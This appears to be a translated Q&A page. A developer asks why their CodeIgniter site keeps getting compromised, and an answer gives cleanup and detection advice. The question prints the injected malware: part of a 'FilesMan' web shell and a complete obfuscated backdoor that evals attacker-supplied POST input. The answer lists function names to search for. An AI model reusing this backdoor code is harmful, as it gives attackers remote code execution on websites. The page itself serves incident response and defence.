那些遇到过的问题

Codeigniter应用程序被黑客入侵,代码注入index.php

xyl*_*lar 12 php security codeigniter code-injection codeigniter-2

我有一个codeigniter 2.0.2项目,一直被黑客入侵.有两个主要问题:

  • 恶意代码正被添加到index.php文件的开头
  • 恶意文件被添加到服务器

根据主机,没有FTP日志表明这些文件已上传.

  1. 由于没有与恶意文件相关的FTP上传日志 - 这是否意味着它必须是通过网站本身的利用,例如联系或上传表单?

  2. 该网站是在共享主机上 - 代码它是同一台服务器上的网站也被黑客攻击,这是导致问题的原因?

  3. 如果我将index.php的文件名更改为其他内容会有帮助吗?

  4. 由于index.php是越来越修改我应该执行命令chmod 644?

  5. 我一直在寻找codeigniter项目的建议权限,但尚未获得任何来源.除了上传/日志目录(777)之外,我在网站上想到644 - 这听起来不错吗?

注入index.php文件顶部的代码:

<?php if(isset($_GET["t6371n"])){ $auth_pass="";$color="#df5";$default_action="FilesMan";$default_use_ajax=true;$default_charset="Windows-

然后是一个带有长编码字符串的长preg_replace语句.接下来是第二个声明:

if(isset($_GET["w6914t"])){$d=substr(8,1);foreach(array(36,112,61,64,36,95,80,79,83,84,91,39,112,49,39,93,59,36,109,61,115,112,114,105,110,116,102,40,34,37,99,34,44,57,50,41,59,105,102,40,115,116,114,112,111,115,40,36,112,44,34,36,109,36,109,34,41,41,123,36,112,61,115,116,114,105,112,115,108,97,115,104,101,115,40,36,112,41,59,125,111,98,95,115,116,97,114,116,40,41,59,101,118,97,108,40,36,112,41,59,36,116,101,109,112,61,34,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,66,121,73,100,40,39,80,104,112,79,117,116,112,117,116,39,41,46,115,116,121,108,101,46,100,105,115,112,108,97,121,61,39,39,59,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,66,121,73,100,40,39,80,104,112,79,117,116,112,117,116,39,41,46,105,110,110,101,114,72,84,77,76,61,39,34,46,97,100,100,99,115,108,97,115,104,101,115,40,104,116,109,108,115,112,101,99,105,97,108,99,104,97,114,115,40,111,98,95,103,101,116,95,99,108,101,97,110,40,41,41,44,34,92,110,92,114,92,116,92,92,39,92,48,34,41,46,34,39,59,92,110,34,59,101,99,104,111,40,115,116,114,108,101,110,40,36,116,101,109,112,41,46,34,92,110,34,46,36,116,101,109,112,41,59,101,120,105,116,59)as$c){$d.=sprintf((substr(urlencode(print_r(array(),1)),5,1).c),$c);}eval($d);}

有一个联系表单和一个表单,用户可以使用CKFinder 2.0.1上传项目.要更新它,看看是否能解决它.

Mud*_*ark 11

你可以做几件事:

  • 检查您的日志文件是否有对具有奇怪或不熟悉名称的文件的POST请求,例如.cache_123.php- 这些可能是后门脚本,尤其是以点开头的文件名,因此将其隐藏在(常规)文件系统中.
  • 下载完整的直播现场,做的东西,如一个站点范围内的搜索base64_decode,exec,preg_replace,passthru,system,shell_exec,eval,FilesMan
  • 通过反病毒软件(AVG,Avast,...)运行它来检查整个(下载的实时)站点
  • 如果可能的话,Chmod上传目录775而不是777

  • @Mansfield是的,已经添加了一个. (3认同)

归档时间:

查看次数:

13034 次

最近记录:

12 年,3 月 前
相关归档
签名会话cookie.一个好主意? 29
Angular 2:清理HTML使用div id删除了一些内容 - 这是错误还是功能? 23
使用PHP进行文本挖掘 22
使用curl命令行将多个文件上传到php服务器 21
Heroku支持PHP吗? 19
如何理解Google Chrome中针对Asp.net提供的静态资源的安全警告 9
在Android上本地安全地存储密钥或密码 8
如何实现用户以安全的方式发布一些html格式的数据的可能性? 6
Lambda 函数所承担的角色的 ARN 是多少? 4
ASP.NET在HTTP和HTTPS上保护Cookie 3
难疑归档
应该在JavaScript比较中使用哪个等于运算符(== vs ===)? 5666
如何在Java中生成特定范围内的随机整数? 3373
从Git存储库中删除文件而不从本地文件系统中删除它 2892
如何使用保存实例状态保存Android Activity状态? 2538
如何在Git中获取当前分支名称? 2321
如何检查Bash中是否设置了变量? 1417
如何计算列表项的出现次数? 1417
静态只读与const 1349
如何在jQuery Ajax调用之后管理重定向请求 1319
如何在Vim中移动到行尾? 1140